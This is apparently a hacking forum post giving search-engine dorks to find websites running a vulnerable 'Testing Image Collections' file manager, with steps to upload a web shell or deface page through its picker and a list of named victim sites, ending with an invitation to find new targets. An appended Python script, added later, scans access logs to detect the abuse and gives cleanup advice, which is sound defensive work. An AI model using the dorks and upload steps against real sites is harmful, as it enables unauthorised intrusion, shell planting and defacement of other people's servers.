"Testing Image collection" shell and file upload vulnerability
Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"
Go to Google or Bing and enter the dork inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
Now look at the search results in Google or Bing.
Select any site from the search results and look for the upload option.
Here is a demo of the upload button:
Now select your shell or deface page and upload it.
To view your uploaded shell or deface page, go to:
http://website.com/files/yourfilehere or
http://websites.com/path/yourfilehere
Live Demo :
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=&highlight_file=472
result : http://www.bantamorloff.co.uk/files/backlinks.html
other live examples :
http://www.admiralfc.co.uk/modules/filemanagermodule/actions/picker.php?id=0
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0
*UPDATE: Demo sites are patched now. Find a new target >:D<
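For site owners running this module, one way to check web server access logs for the activity described above (requests to the picker, then script or HTML files served from the upload directory), as an added example that is not part of the original post. It assumes Apache combined-format logs; the sample lines, the IP addresses and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:02 +0000] "GET /modules/filemanagermodule/actions/picker.php?id=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2013:10:01:40 +0000] "POST /modules/filemanagermodule/actions/picker.php?id=0 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2013:10:02:05 +0000] "GET /files/upload-test.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2013:10:05:00 +0000] "GET /files/team-photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2013:10:06:00 +0000] "GET /files/missing.html HTTP/1.1" 404 312 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Mar/2013:10:09:00 +0000] "GET /newsite/files/notes.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
PICKER_DIR = "/modules/filemanagermodule/actions/"  # path shown on the page
UPLOAD_DIR = "/files/"                               # upload location shown on the page
ACTIVE_EXT = (".php", ".phtml", ".php5", ".html", ".htm", ".shtml")  # assumed list

def find_upload_abuse(log_text):
    """Return (picker_hits, fetches).
    picker_hits: {client_ip: number of requests to the picker directory}
    fetches: [(client_ip, path, touched_picker)] for every 200 response to a
    script/HTML file in the upload dir; touched_picker is True when the same
    client requested the picker earlier in the log."""
    picker_hits, fetches = {}, []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target, status = m.groups()
        path = urlsplit(target).path.lower()
        # Substring match: the module may be installed under a sub-directory.
        if PICKER_DIR in path:
            picker_hits[ip] = picker_hits.get(ip, 0) + 1
        elif UPLOAD_DIR in path and path.endswith(ACTIVE_EXT) and status == "200":
            fetches.append((ip, path, ip in picker_hits))
    return picker_hits, fetches

if __name__ == "__main__":
    hits, fetches = find_upload_abuse(SAMPLE_LOG)
    print("picker requests per client:", hits)
    for ip, path, touched in fetches:
        print(f"active content served from upload dir: {path} to {ip} (picker seen: {touched})")
```

Any hit is a reason to list the upload directory on disk, remove files that are not images, and stop the web server from executing or serving scripts and HTML from that directory.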